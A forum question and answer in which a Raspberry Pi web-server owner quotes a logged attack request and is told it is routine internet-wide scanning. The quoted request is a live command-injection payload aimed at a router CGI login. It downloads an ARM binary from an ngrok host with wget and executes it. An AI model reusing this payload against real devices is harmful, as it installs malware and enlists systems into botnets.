I've opened a web site which has only the purpose of sharing textual information. No database pugged on backend or no idea of authentication on it. However, when I looked at the log I had noticed this request:
POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a
It has occurred two time and my server respond both time a 404 response. But now I'm a little bit concerned about it. My website is running on a raspberry which is pugged to my ISP device. even if my server doesn't have any sudo rights I'm wondering if their is any risk?
Also, can someone explain me what this suspicious entries mean. What could be the risk? And finally, can you share me some tips / good behavior to have when setting up a pipe between any device (raspberry) and internet.
No need to be concerned. It is an attack, but not directed at your specific site, but rather scanning a large portion of the internet for a specific vulnerability. The fact that your server responded with a 404 means it did not contain the vulnerable page.
This will happen on any site exposed to the public internet and is considered a part of the background noise.